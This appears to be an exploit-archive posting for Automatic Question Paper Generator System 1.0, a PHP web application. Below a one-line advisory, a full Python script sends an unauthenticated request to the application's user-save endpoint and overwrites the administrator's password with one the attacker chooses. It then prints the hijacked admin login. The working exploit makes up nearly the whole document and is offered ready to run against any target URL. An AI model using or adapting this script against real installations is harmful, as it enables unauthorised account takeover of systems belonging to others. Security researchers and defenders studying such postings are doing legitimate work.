Automatic Question Paper Generator System 1.0 Insecure Direct Object Reference

Automatic Question Paper Generator System version 1.0 suffers from an insecure direct object reference that allows an attacker to reset the password of other users.


MD5 | 233bb5192c00cb509cec2fd98ea837f5

# Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass
# Date: 2022-04-03
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
#!/usr/bin/env python3
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse

def banner():
print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/

[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')

def main():
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}

boundary = '----WebKitFormBoundary' +
''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)

headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}

r = requests.post(f'{arguments.url}/classes/Users.php?f=save',
headers=headers, data=m)
if '1' in r.text:
print(f'[+] Account taken successfully! Login:
admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')

if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='Target URL (
http://target.com/aqpg/)', dest='url', required=True)
parser.add_argument('-p','--password', action='store', help='New
password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()

Related Posts